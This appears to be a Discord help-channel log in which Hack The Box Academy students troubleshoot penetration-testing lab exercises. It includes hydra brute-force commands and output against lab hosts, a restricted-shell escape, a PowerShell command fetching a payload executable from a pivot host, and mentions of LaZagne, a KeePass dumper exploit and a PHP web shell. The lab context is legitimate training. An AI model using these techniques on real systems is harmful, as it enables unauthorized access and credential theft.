#modules
the normal password list and the mutated one
[STATUS] 411.00 tries/min, 411 tries in 00:01h, 9780200 to do in 396:37h, 29 active
looooooooooooool
$ hydra -L username.list -P mut_password.list -t 64 ftp://10.129.13.48
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-13 15:48:13
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 9780576 login tries (l:104/p:94044), ~152822 tries per task
[DATA] attacking ftp://10.129.13.48:21/
[STATUS] 411.00 tries/min, 411 tries in 00:01h, 9780200 to do in 396:37h, 29 active
[STATUS] 457.67 tries/min, 1373 tries in 00:03h, 9779238 to do in 356:08h, 29 active
this gets it there but it is encoded and doesnt execute on the victim server
Just to make sure, you aren’t trying to run a .exe on a linux system are you?
Yea exe is for windows, lazagne should have a python version too I think?
any help guys
yes I gotta find it
my brain is fried. this is what i get when i do python3 laZagne.py all on the host
Traceback (most recent call last):
File "laZagne.py", line 17, in <module>
from lazagne.config.write_output import write_in_file, StandardOutput
ModuleNotFoundError: No module named 'lazagne'
yeah im stuck on this machine
Password Attacks Lab - Easy
Our client Inlanefreight contracted us to assess individual hosts in their network, focusing on access control. The company recently implemented security controls related to authorization that they would like us to test. There are three hosts in scope for this assessment. The first host is used for administering and managing other servers within their environment.
anyone worked on this
i need some help
i'll dm you to avoid spoilers.
you need to allow server members to message you
Hi everyone could anyone give me examples of their notes for modules and boxes in Academy. I'm struggling with making one that will be useful for future
Thanks for help 🙂
is allowed brother on my settings
Your message could not be delivered. This is usually because you don't share a server with the recipient or the recipient is only accepting direct messages from friends.
I actually block people from messaging me because it's been abused in the past lol
let me turn it on real quick
try now
everyone's notes are going to be different.. you also shouldn't base your notes off of what other people are doing. take your time and figure out what works for you
done
Your message could not be delivered. This is usually because you don't share a server with the recipient or the recipient is only accepting direct messages from friends. You can see the full list of reasons here:
lool
again
send me a friend request
well now I am stuck on the Passwd, Shadow & Opasswd module. cant cat anything without root and I dont see any hints on how to get the shadow file
There is a directory that the user has that has the files
Im doing the easy password cracking lab right now, I'm running hydra against the ftp server with just the username and the password list given in the resources, and the password file is not mutated, hydra is saying it is going to take an hour, I have -f set so it could take less, but is that normal?
Hi, this explanation from XSS I dont understand why the first is suspicious and the second one isnt
https://academy.hackthebox.com/module/51/section/1592 - saw someone put this ||grep -rnw "/" -e "HTB"|| ngl, had to man page and explainshell that command. I used ||grep -r "/" "HTB"|| but the first command works better.
What are things that you have done till now on this question?
Add the flag -t 64
ok ill keep that in mind, I ended up getting it after 50min lmfao
And it took me 2h
yeah
only 50 min for you you so lucky 😂😂
i guess so 
If you find something can you share it with me
anyone
hello everyone i am new here
and also new to hacking, i have been researching a bit but its too much info and idk where to start, i have a little bit of prior programming experience in javascript but i am very amateur i was hoping you can guide me
htb academy, notes, time, repetition
ohh ok
just start by doing my guy. HTB has academy and their older machines with walkthroughs and youtube videos. Highly recommend you start with something like https://obsidian.md so you can jot down notes and lessons as you go as well.
┌──(shadowalker㉿kali)-[~/Downloads]
└─$ hydra -L username.list -P password.list -t 64 smb://10.129.202.221
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-14 00:05:36
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 21112 login tries (l:104/p:203), ~21112 tries per task
[DATA] attacking smb://10.129.202.221:445/
[ERROR] target smb://10.129.202.221:445/ does not support SMBv1
guys can i change the version of smb on hydra
cuz i know that the service is runing an smbv2
ig notion is way better for beginner
hydra -L username.list -P password.list -t 64 10.129.202.221 smb2
thx broo ur the best
👍
Hydra does not natively support SMBv2 or SMBv3 for brute-forcing. The smb module in Hydra typically attempts to use SMBv1,
XD ill use crackmapexec
guys any idea
how can i decrypt this file file Documentation.docx
Documentation.docx: CDFV2 Encrypted
just hints no spoil
never mind i can use john to get the password to decrypt it
Can I help me please? Private?
read #welcome and #rules after that use /verify at #bot-commands and ask that at #boxes
why? if you are having issues with HTB main platform boxes ask it in #boxes
I don't have access in "no access"
Read and follow #welcome
hello i make the Nginx Reverse Proxy & AJP
i have commented the nginx.conf but i have this ( invalid port in upstream)
is it just me or is the academy site down? 500 Server is not feeling well
aaand its back
also is this a good area to ask about why i cant do from "pwn import xor" on the downloaded parrot htb distro? it says ModuleNotFoundError: No module named 'elftools.common.py3compat'
is htbacademy down?
Apple does the same. When they launch new products, the store is taken offline....
it gives 502 error
maybe add module
i get "bad gateway".. not sure what's so bad about it, it seems to be working fine.. the host behind the gateway, now that's a different story
So far they have done it without interruption 😉
Guys Try HEAD Method Lol
adding new exam buying option (CDSA) 
ah ok
or maybe someone pwned and got the flag...
i hope so .....
what is it cdsa
is the point of the academy.hackthebox to hack it and get the flag? and here we were just doing the cources
Cert for the SOC Analyst Path
ah ok
Eskalation
AcademyTwo
tldr
i luckily still have the page up for what section im working on but cant do anything cause it says to Create the XOR ciphertext of the password 'opens3same' using the key 'academy'. (Answer format: \x00\x00\x00....) the parrot htb distro says it doesnt have 'elftools.common.py3compat'
I think you can do it manually with python
what module are you doing
take the opportunity and try finding three other ways of doing xor 👍
pip install pyelftools
Cracking Passwords with Hashcat Hashing vs. Encryption, there are other ways
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: pyelftools in ./.local/lib/python3.9/site-packages (0.30)
DEPRECATION: gpg 1.14.0-unknown has a non-standard version number. pip 23.3 will enforce this behaviour change. A possible replacement is to upgrade to a newer version of gpg or contact the author to suggest that they release a version with a conforming version number. Discussion can be found at https://github.com/pypa/pip/issues/12063
DEPRECATION: wfuzz 3.1.0 has a non-standard dependency specifier pyparsing>=2.4*. pip 23.3 will enforce this behaviour change. A possible replacement is to upgrade to a newer version of wfuzz or contact the author to suggest that they release a version with a conforming dependency specifiers. Discussion can be found at https://github.com/pypa/pip/issues/12063
Calculate the exclusive or (XOR) with a simple web-based calculator. Input and output in binary, decimal, hexadecimal or ASCII.
cool Fixed now
Maybe run the script with Python3.9 but dont know any further
its telling that its installed
its back
hello i make the Nginx Reverse Proxy & AJP
i have commented the nginx.conf but i have this ( invalid port in upstream)
want me to paste the entire output?
And gone
yea woop
Y
$python3.9
Python 3.9.2 (default, Feb 28 2021, 17:03:44)
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
from pwn import xor
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/home/galareed/.local/lib/python3.9/site-packages/pwn/__init__.py", line 4, in <module>
from pwn.toplevel import *
File "/home/galareed/.local/lib/python3.9/site-packages/pwn/toplevel.py", line 23, in <module>
from pwnlib import *
File "/home/galareed/.local/lib/python3.9/site-packages/pwnlib/dynelf.py", line 57, in <module>
from pwnlib import elf
File "/home/galareed/.local/lib/python3.9/site-packages/pwnlib/elf/__init__.py", line 9, in <module>
from pwnlib.elf.corefile import Core
File "/home/galareed/.local/lib/python3.9/site-packages/pwnlib/elf/corefile.py", line 79, in <module>
from elftools.common.py3compat import bytes2str
ModuleNotFoundError: No module named 'elftools.common.py3compat'
dont use pwntools?
maybe pip install elftools
there are infinite ways to make a XOR cipher
pip3.9 install --force-reinstall pyelftools
pip3.9 install --force-reinstall pwntools
was following the module and got stuck there.
If its still not working after that I would suggest using the Methods that RafaJurado mentioned 👍
Now it works for me
Down, down, down...
pwnbox has its limitations
not for me
yeah... its just erroring saying i dont have the updated dependencies, but when i try installing the dependencies they say that they are fully updated... catch 22. ima just use that website
yeah im getting 502
same for me
same for me
Haha I refreshed several times
same for me 502 now
its up bud
they didnt ban u dw, it was down for everyone for a min
the block is probably temporary
still 504 here
If the work takes a long time, will we get extra time to take the exam?
because i have ~30h to complete CBBH and Report
+1
now up but slow
Up!
someone actually have been doing their modules
down now
so who is hacking the box anyway? also i found a website to do it, i hope i wont need elftools
Finally my IP got removed from blacklist
Its actually up now
u can downgrade pyelftools to a working version:
pip uninstall pyelftools -y
pip install pyelftools==0.29
import should work after
i think...
Thanks so much, that worked 😄
no one has the ideas to solve it? 🤨
where are you having problems?
i couldn't figure out the answer for the GET section of Web Requests module.
hello y'all, is this error meaning the xp_cmdshell is not enabled in the MSSQL Srv :
The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'...???
go through the module again
Thank You. i did it.
Hello.
Decided to do something to take my mind off of it, so why not learn something new?
I was learning Turkish
That is harder than CPTS
Ah, Turkish reminds me of something.
Kebab ?
anyone know how to solve this error with hashcat? clBuildProgram(): CL_BUILD_PROGRAM_FAILURE
error: unknown target CPU 'generic'
- Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.
ps
Device #1: pthread-AMD Ryzen 9 5950X 16-Core Processor
My best friend, not anymore.
I can understand you, I can really understand
A fight ruined everything, ruined my life too, that was the last straw.
I am sorry that it ended up like that I hope you have moved forward from that point and meet awesome people .
That happened yesterday my friend.
I got some drinks and balcony if you are around come and share the story
Where brother?
||Pakistan||
I hope so, do you know how to code with python?
Depends on what we are coding but I can f around and figure out
Beginner things, just started.
This isn't a general channel. Please verify your account following #welcome to be able to access more channels
"Automate the boring stuff" is a good pickup btw (free online)
exactly I was gonna suggest that
I don’t quite know where to find my account identifier
https://academy.hackthebox.com/module/51/section/1845 - is not accepting the flag
It's on the main site app.hackthebox.com
That doesn't look like a full flag
what? hmmm
even with HTB{ it doesn't work
I blurred out the rest. Is that what you mean?
strange
I ran this bash loop to get it ||while read line; do echo $line; done < /opt/flag.txt; echo $line||
restricted shell - 
are you sure it's even meant to be in brackets? ¯\_(ツ)_/¯
hello i make the Nginx Reverse Proxy & AJP
i have commented the nginx.conf but i have this
just ||cat /opt/flag.txt|| should work 👍
Logrotate section in Linux priv escalation
How many minutes I have to wait until I get connection on my machine. Like am waiting for 5 minutes no response
anyone know how to solve this error with hashcat?
clBuildProgram(): CL_BUILD_PROGRAM_FAILURE
error: unknown target CPU 'generic'
Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.
ps
Device #1: pthread-AMD Ryzen 9 5950X 16-Core Processor
it doesn't
that's the first thing I tried
||ssh htb-user@$ip -t "bash --noprofile"||
I forgot to escape the shell, then cat the file. You were right it was cut off.
Hello am new here
welcome brother
hello guys
im on the hard lab
password attacks
i found a keepass on the machine version 2.50
which is KeePass 2.X Master Password Dumper (CVE-2023-32784)
i tried to run the xploit and im getting this error
┌──(shadowalker㉿kali)-[~/hardlab/keepass-password-dumper]
└─$ dotnet run ~/hardlab/KeePass.DMP
Welcome to .NET 6.0!
SDK Version: 6.0.400
Installed an ASP.NET Core HTTPS development certificate.
To trust the certificate run 'dotnet dev-certs https --trust' (Windows and macOS only).
Learn about HTTPS: https://aka.ms/dotnet-https
Write your first app: https://aka.ms/dotnet-hello-world
Find out what's new: https://aka.ms/dotnet-whats-new
Explore documentation: https://aka.ms/dotnet-docs
Report issues and find source on GitHub: https://github.com/dotnet/core
Use 'dotnet --help' to see available commands or visit: https://aka.ms/dotnet-cli
/usr/share/dotnet/sdk/6.0.400/Sdks/Microsoft.NET.Sdk/targets/Microsoft.NET.TargetFrameworkInference.targets(144,5): error NETSDK1045: The current .NET SDK does not support targeting .NET 7.0. Either target .NET 6.0 or lower, or use a version of the .NET SDK that supports .NET 7.0. [/home/shadowalker/hardlab/keepass-password-dumper/keepass_password_dumper.csproj]
The build failed. Fix the build errors and run again.
Look again in the module how to attack something like this.
||John|| is always a good friend
anyone else having trouble connecting to academy network? I've switched and reloaded my vpn multiple times and cannot connect
Currently trying to bruteforce ftp/ssh in the password mutation section for password cracking module. Ive made a list of around 8k based on other tips ive found online but it still seems to not be working
nvr mind
i got it
Hi guys, i have a question regarding AD Skill Assessment II. I already completed it but just confused as to why the ms01 machine can get more ntlmv2 user hashes than the kali attack machine via LLMNR poisoning even though both are on the same subnet.
hi @everyone
this is a driver issue, what are you running it on and which runtime?
I'm guessing POCL based on the error
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] yes, ive been trying to switch to amd rocm but either im messing it up or it doesnt help me
yeah that's pocl
so the actual "issue" is that pocl doesn't support your CPU
at least, not specifically, hence the "generic" target
AMD ROCm will also probably not work here
since it's a GPU specific runtime
you will need to replace pocl with Intel's CPU runtime (counter intuitive, i know, but AMD doesn't have their own)
yeah i saw that online, but i dont know which one, the intel-opencl-icd?
I tried to exploit that and i got 2 master keys but none of them work
Ig ill try the john like you said
installation package. Check the release notes to ensure supported targets include your target device.
Linux* OS
Please take one of the following methods to install the Intel CPU Runtime for OpenCL™ Applications.
Download Intel® oneAPI Base Toolkit to install the latest OpenCL™ CPU runtime.
Visit Intel® CPU Runtime for OpenCL™ Applications with SYCL support to download and install the latest OpenCL™ CPU runtime for Linux*.
Github: https://github.com/intel/llvm/releases
Search for "oneAPI DPC++ Compiler dependencies" and find latest release to download, e.g. https://github.com/intel/llvm/releases/tag/2020-WW20
Follow the installation instructions to install.
under the Intel® Xeon® Processor OR Intel® Core™ Processor (CPU) Runtimes section here: https://www.intel.com/content/www/us/en/developer/articles/tool/opencl-drivers.html
Obtain runtimes to execute or develop OpenCL™ applications on Intel® processors.
so after i get that, how would i switch to it? i don't see too much info on it.
Hello, I'm in password attacks --> password mutations. I have mutated the wordlist with the ||custom.rule|| and I grepped by ||b's|| but i don't get anything. Any hint please?
I'm brute forcing ftp, that is faster to brute than ssh i suppose
…
Check this helped me a lot
After installing it, it still wants to use POCL, how would i switch it to use intel instead?
I did yes, and now it says there is none.
yeah, you'll probably want to install the icd package
the one you had identified before
intel-opencl-icd is already the newest version (22.39.24347).
clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR
ATTENTION! No OpenCL-compatible or CUDA-compatible platform found.
You are probably missing the OpenCL or CUDA runtime installation.
Yeah, this is the problem with these runtimes lol
registration can be a huge pain in the ass
trying to figure out how to make it see it >.>
whats up guys, new here. i need some help
i was trying to change my email to my student email and i accidentally typed it in wrong. so now it wants me to log into a nonexistent email and verify it...
anyway i can change the email without having to verify it?
This is a question for support. We won't be able to help you.
Hello, I have the question is there any order I should do modules in Penetration Tester Path ? I did Attacking common Services and now it directs me to PIVOTING, TUNNELING, AND PORT FORWARDING ?
The order listed in the path is the order that you should complete them in, to ensure that you have all the skills necessary. Some modules will expect you to have done other modules.
how can i contact support and get a rather quick response?
contact us via the green chat bubble bottom right. make sure to disable adblocker
hey Guys I'm in "Password Attacks Lab - Hard"
I can't get the mount file ...
I try this website : https://itsfoss.com/mount-encrypted-windows-partition-linux/
but when I do it it gives me :
"Thu Sep 14 20:00:58 2023 [CRITICAL] Cannot parse volume header. Abort."
any1 can help me please it driving me crazy
I used the procedure outlined by the user Arrano in here.
This one
I just finished Attacking Common Services - Medium but if I'm honest, it was only the fact that I read in here that ||my nmap wasn't broad enough || that gave me the necessary info. So I thought I'd ask those who managed to figure it out by themselves, are you ||scanning all ports each time you do an nmap rather than just top 1000|| or was there something in the standard nmap that gave you the clue?
I just finished this module...What do you need help with?
find a diff way to auth
never mind
guys anyone know how can i mount this file Backup.vhd i was trying to do so but i was getting errors after errors
thank U !!!!
how can i know that the file is protected with bitlocker
cuz i dont have any info about how bit locker work or how do i know that the file is protected with bit locker
hey guys I'm in the Docs and reporting module and I'm trying to understand why my answer is wrong. Am I inputting the answer wrong?
Yeah, i almost had to brute force this too... the format is [key] + [key] + [key] + [key] if that helps. I used all caps as well.
so theres another input I need to have thanks
no dice
your last character is a bit off
are they going off of the ippsec settings because the first sheet has that as how to do vertical splits
idk I may just come back to it later because I'm still not seeing the correct answer. I've tried both the tmux cheat sheet and the ippsec cheat sheet and neither have worked.
help guys 😦
bit locker requires pro version of windows in order to be used
i found that back up
tried to mount it
it wont
do you have it enabled?
how can i know that is encrypted with bitlocker
he mean the section lol
sorry for the delay
its oki
did you crack the pass first?
no i didnt
i got the file
tried to mount it
too many errors
how can i know its protected with a password and its using for encryption bitlocker
if you can't on linux you can always do it on windows but you need to extract and crack the hash first
sure
No it doesn't
Unless you're referring to encrypting your own drive
If you look in the module it says to use % for vertical and " for horizontal
Yea I was talking about personal drives
They supplied two different things then because my earlier screen shot shows very with “ not
%
Do single quote
no it doesnt
I’ll try when I get home
Yes for personal drives it does
I think you still can with cmd line. But the major point was that, by saying that you could have thrown someone way off from how they were going to do the module.
Was given half info when i replied to the message. Originally
manage-bde goes brrrrr
Nah I scrolled up, plenty of context was given
Are you referring to using it on your own system or a target? And from when I replied because all I said was it required pro/enterprise to use. I didn’t know what it was being used on until after my statement.
I mean I scrolled up from where you replied to the user
Before answering questions try gathering context (scrolling up usually).
Heard, staying quiet is more my speed so I’ll just leave the question answering to others then.
This may be completely irrelevant for now but if anyone in future needs: if anyone is using ZAP for fuzzing and needs an ASCII encoder processor, install the community scripts add-on from the zap marketplace, then enable to-hex.js script under the Payload Processor in the scripts pane on the left. You should be able to select scripts in the processor pane and see to-hex.js when fuzzing
hi I'm on hard lab pwd attacks and have been trying to mount the vhd using qemu-nbd and bitlockermount but is not working. Have been checking the history in the channel and the forums but can't understand what is the problem
with dislocker it prompts the Cannot parse volume header. Abort.
and with cryptsetup bitlkOpen it shows not a valid BITLK device even if I had no problems when using the qemu-nbd command and the Backup file
I've used a quick Windows virtual machine if that can help
can I dm you?
sure no problem
yes it will help
Hi everyone. After taking a break I continued with the CPTS and lo and behold, my old arch nemesis: fuzzing. I'm currently stuck in https://academy.hackthebox.com/module/54/section/511 on question 3. Can someone give me some pointers / hints about which wordlist(s) I need to use or should consider... Many thanks
Hello everyone im doing the module Linux privilege escalation, im in part logrotation, im trying to find the configuration file (/etc/logrotate.conf) but doesnt appear, could somebody give me a hint please?
the "logrotate.conf" file isn't present
im trying to execute logrotate but my nc is like this
listening on [any] 3333 ...
but never gets a connection
you can use ||directory-list-2.3-small.txt||
taking into account that you're making the right steps it could be that the payload isn't triggered, there are better ways to achieve the end-goal rather than getting a reverse shell up to you anyway
i understand i try something
how can i know if the payload is triggered or what i need to do to trigger it?
on how to trigger it you have to find it out, to see if it is being triggered you could ping yourself while listening with tcpdump
this is what I would do, probably there are better ways to confirm that is working the way it should
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
- Device #1: cpu-sandybridge-AMD Ryzen 5 5600H with Radeon Graphics, 2819/5702 MB (1024 MB allocatable), 6MCU
Minimum password length supported by kernel: 4
Maximum password length supported by kernel: 256
Counted lines in /home/shadowalker/Downloads/mut_password.list
Insufficient memory available
zsh: segmentation fault hashcat -m 22100 /home/shadowalker/Downloads/mut_password.list backup.hash
im facing this problem any help guys
i tried to restart my pc update it but still
hey friends, in Attacking Common Applications Attacking Applications Connecting to Services how to solve this
did you put straight away the break-point? Before doing that just execute the run command
Thank you, then I'm at least on the right track
I see this sometimes when I accidentally swap the "wordlist" and the "hash" but it could be that you have not enough RAM available but I don't think this is the case. Anyway make sure to follow the right command syntax hashcat -m <mode> <hash> <wordlist>
thank you , i did it right now 👍 😊
hey did you figure this one out? i've found the set values but none of them are accepted. thanks!
Hey Do U remember how U did it ?
I'm stuck at that "Pass the Ticket (PtT) from Linux" Q: "Use the LINUX01$ Kerberos ticket to read the flag found in \\DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_). "
and I don't get it
If someone have a hint 4 me please ...
I can't recall tbh, which module is it ?
I have, let me check
"Password Attacks" ==>> "Pass the Ticket (PtT) from Linux" ==>> Question :
Use the LINUX01$ Kerberos ticket to read the flag found in \\DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).
i have to run to the store, but if no one helps you by the time i get back i'll dm you
Dm me what you’ve tried
I went through my notes and I haven't added anything other than what is already in the module so I'm not sure what did I do more/different to get
For me it was a matter of formatting it, still not sure why it didn’t work for me
ok, I'll go through it again
thanx
Sorry for my fish memory
😆 np
@fiery berry got it now, but it was a different wordlist
OMG, that was such a BS
I am currently working through the attacking enterprise networks module and am on Internal Info gathering, I am finding when transferring nmap to the target and applying correct chmod that it is failing to launch with errors such as unable to find nmap service reverting to /etc/hosts, I am also finding that running enum4linux through proxychains is telling me to install smbclient which I have
need to work out if I have a bug or missing something
thanx, I just found it
wasn't what I thought (I made it 2 complicated than it is )
what was it ? so I can add it to my note
btw the whole module is tough you just need to be patient and focused
nmblookup is not in your path etc, I am working from my kali bare metal via VPN connection to lab, proxychains nmap
just enumeration in the ||smbclient //dc01/c$ ==>> SharedFolder ==>> linux01||
since I'm root already (got the needed credentials) ...
yes this was my last 1
the last lab =OMFG
it's better to use something like ligolo-ng for pivoting and if you are using proxychains at least use proxychains4 and for tools like enum4linux it's old af if you want to some semi auto smb enum try enum4linux-ng
also for nmap if you have a pivoting, moving the nmap binary on to the target just to do some scanning is one of the worst thing that you can do
I would tend to agree however I was following the instructions in the module
I moved the nmap binary and it will run but as soon as I give it --open -iL live_hosts I get the errors above relating to failure to find nmap services
it's recommended that you do this section blind
let's take this troubleshoot to DM if you want
sure thing
I don’t know if you solved this, but there’s another way to do this than suggested on the module, which is the way that I got it to work. Instead of creating a rev shell, perhaps you could create something else/someone else…
Hi guys, I am currently doing the medium lab for attacking common services and I am unable to bruteforce FTP, every time I try I get this error: target was disabled because of too many errors
Does anyone know how to circumvent this?
easy*
Can I DM someone about the File Upload Attack Skill Assessment?
I can dm you, if you still need help
that would be awesome 😄
Anyone working on the NTLM relay skills assessment question #3 that can help me understand something about the question?
feel free to dm
I am working on the final question for the hacking word press assessment. I have an admin password and can get to the admin page. i can not seem to edit the theme. i get an error even if i do not update the 404.php page but hit the update file button. it says: Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.... Am i missing some setup that I need to enable to let it communicate back with the site
did you use something like the Twenty Seventeen theme?
nope i used 19
give that theme a try
from what internet says the error would appear to be that wordpress seems to be doing some code check to make sure there are no typos and in that check process it is not getting a proper response back... i am trying to use metasploit (msfconsole and wp_admin_shell_upload) to get a real reverse shell but having issues with that too. the metasploit thing is most likely me ... me and metasploit do NOT seem to like each other much.
not sure what you found out about that error code but the issue are probably in the theme that you used so try the one i suggested
that works; Thanks
yeah, the trick is slow the F down you don't need to jump straight away to a different method first thing after your previous try doesn't work
not really clear on why i cant do it with 19 still not sure what the error means
also not sure how to use the cmd through the url properly ... i ended up just editing the php file repeatedly ... sometimes %20 worked other times it did not and i could not find any information on what encoding i should be using or how to figure out what was messing with the encoding. so just edited the php directly with stuff like system('cat ../foo/bar/baz.txt')
here is some more info on https://www.hackingarticles.in/wordpress-reverse-shell/ and here is the payload that i recommended https://github.com/Arrexel/phpbash
all HTB target machines don't have internet so if anything involves it, it doesn't work, so my guess from what you found the error was is that the theme needed internet to check or do something
the moral of the story is if a theme doesn't work try a different one 🤣
thanks i will look those over
In the "Password Spraying - Making a Target User List" section of Active Directory Enumeration & Attack Module, there is sentence mentioning "flast" format.
Let's try out this method using the jsmith.txt wordlist of 48,705 possible common usernames in the format flast
Anyone know what this is in reference to? I can't seem to find any information on it.
aahh, I'm silly. Thanks!
Where do I start from please, I am a novice here
Shells & Payloads - Laudanum question 2: it wants the path given in the section above. Never mind that it's also present under /opt and one of the path components in the answer is a symlink (so it won't show up with find by default)
I am currently on the footprinting module, on the MSSQL section. I cannot run mssqlclient.py, it says it doesnt exist. is there a certain directory i need to be in? or am i approaching this the wrong way? DMs welcome
impacket-mssqlclient (I'm assuming you're on kali linux)
└─$ smbclient -U david \\10.129.7.126\david
Password for [WORKGROUP\david]:
Try "help" to get a list of possible commands.
smb: \> get Backup.vhd
parallel_read returned NT_STATUS_IO_TIMEOUT
im getting this error since the morning
run locate mssqlclient.py to see what file path yours is in. Mine is in impacket/build/scripts-3.11/ yours might be somewhat different.
hello y'all I'm doing the Pivoting, Tunneling, and Port Forwarding Module | Remote/Reverse Port Forwarding with SSH section, I'm trying to replicate the scenario described in the section but, I'm not sure how to connect with the Windows Machine to download the payload from the Pivot
I tried with the Dynamic port forwarding explained previously with no success
anyone who has made it and is willing to explain me..!!!
or point me to the paragraph/section where is mentioned in the content..!!!!
everything is explained in the module, I'm not sure where you're struggling
if you want to download something from the "jump host" start a "python simple server" (sure there are other ways to accomplish it) and from the Windows machine in the internal net you have just to download it as per example shown
ok., how do you download something from the Windows machine if you don't get access to it?
I mean, this command PS C:\Windows\system32> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe" need to be run from the windows machine or downloaded from a web browser from the machine as well
I'm struggling with the fact I'm not seeing how to connect to Windows machine to download or run the PS command..!!!
cause you need to find valid credentials to connect to that machine or you exploit a listening service
answer the questions and go ahead there will be the time to do what you want to do so you can replicate the steps. I guess you can even do it if you want right now, but I don't remember honestly
help guys
i cannot get the file backup.vhd
to my machine, it was corrupted, that's why i was facing
errors
smbclient -U david \10.129.7.126\david
Password for [WORKGROUP\david]:
Try "help" to get a list of possible commands.
smb: \> get Backup.vhd
parallel_read returned NT_STATUS_IO_TIMEOUT
im getting this error since the morning
searching in the forum the issue is VPN route or something related
hi guys
i was trying to do one machine of starting point of hackthebox
it says
Spawn the target machine and the IP will show here
but when in start the pwnbox (which has 2 hour limit)
i'm trying like 2 days
it still does not show the ip there
but the same problem over and over
i do not understand why is this problem, i used to think hackthebox is best site to do boxes, but this basic problem whyyyyyyyyyyy
@sterile hawk
Read #welcome and follow instructions to verify. You'll have access to #starting-point
okay, just did that
now what
#starting-point is where you wanna ask questions relating to it
smbclient //IP/david -c 'get Backup.vhd' -U david
same problem
└─$ smbclient //10.129.58.92/david -c 'get Backup.vhd' -U david
Password for [WORKGROUP\david]:
parallel_read returned NT_STATUS_IO_TIMEOUT
i want to learn to make a cheat for a game
Look at htb academy there's a couple modules related to crafting cheats
try with \\\\<IP>\\<sharename>. Anyway speaking for my self I got the "Backup.vhd" not from the SMB share
Does your password for david start from gXXXXXXXXXXX?
Yes
PIVOTING, TUNNELING, AND PORT FORWARDING: RDP and SOCKS Tunneling with SocksOverRDP
Question:
Use the concepts taught in this section to pivot to the Windows server at 172.16.6.155 (jason:WellConnected123!). Submit the contents of Flag.txt on Jason's Desktop.
Downloaded the SocksOverRDP-Server.exe, SocksOverRDP-Plugin.dll, ProxifierSetup.exe and transferred to the RDP session.
Turned OFF Defender
Then trying to run 'regsvr32.exe SocksOverRDP-Plugin.dll' as per module and getting this error
What am I doing wrong?
dm me
smbclient -L IP -U johanna%johanna's_password
with this do you get to see david share?
Real-time protection still running
working on the attacking common applications, attacking tomcat section. when i access the url web01.inlanefreight:8888/manager i get asked for the username and password, when i access the web01.inlanefreight:8888/manager/html/ i get a page providing some info. BUT when we try to brute force the login page in metasploit, tomcat_mgr_login module the TARGETURI page is set as /manager/html. why is this set to /manager/html and not /manager/ , i did set it to /manager/ and ran the exploit but it didn't run. the exploit runs successfully only if TARGETURI is /manager/html. any ideas why?
Take a close look at the exploit.
Probably Tomcat is only vulnerable on /manager/html in this case.
we are asked to brute force the login page, so shouldn't we put in /manager as the TARGETURI, this is the exploit , auxiliary/scanner/http/tomcat_mgr_login
Take a close look at the exploit.
What exactly does it attack and how?
Then take a close look at the login process in Burpsuite and try to understand when and where which data is sent and processed.
the module also shows us other exploits which can achieve the same brute force functionality, in those exploits the uri is set as /manager
k will do, thanks
ah ok i got it, it redirects to /manager/html. thanks , now i got it!!
can someone nudge me on Documentation & Reporting Practice Lab?
i got some more users' hash from using a tool.
managed to crack some of it.
but not able to login to the DC01
hi im doing the login brute forcing module atm but im stuck on the skill assessment - website question 2. "Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?" I think im doing everything right and when i google it looks like it but it takes sooo long. Do i need to wait that long? i did
sudo hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 178.35.49.134 -s 32901 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
Look at the names of the HTML elements again.
I do not know what you have tried, but ||GetUserSPNs.py|| is your friend
Look at the source code of the website and then check the names of the HTML elements you use.
sorry im new to this, but i already know the username and everywhere i look it says that i should do bruteforce with rockyou.txt but it says its gonna take hours to complete
and i have never used getuserpns.py
@acoustic owl
Think about what hydra does exactly.
Then look at your command again and consider whether Hydra can be successful with it at all.
That was addressed to Kai, not to you
and one more tip.
Do not try to look for solutions in forums or elsewhere. Look for the solution yourself.
Some of the ways described in the forums are not correct. On the other hand, you do not learn the necessary knowledge.
If you are stuck and need help, then ask in the forum or here on Discord explicitly. Then you will certainly get an answer, which leads you in the right direction.
yea I usually dont search up the answers bc i wanna learn but I have been stuck for so long and i cant understand whats wrong with it
you mind pointing me in the right direction? @acoustic owl
I told you to check the names of the HTML elements. The names of the HTML elements you want to address are wrong.
Look at the source code of the website and find out what the HTML elements are really named and then change your command.
Anyone working on the Game Reversing & Modding Skill Assesment ?
i tried with sudo hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-10.txt -f 94.237.59.206 -s 58786 http-post-form "/admin_login.php.:username=user&password=^PASS^:F=<form name='login'"
the names of the HTML elements are wrong.
you do not need sudo here
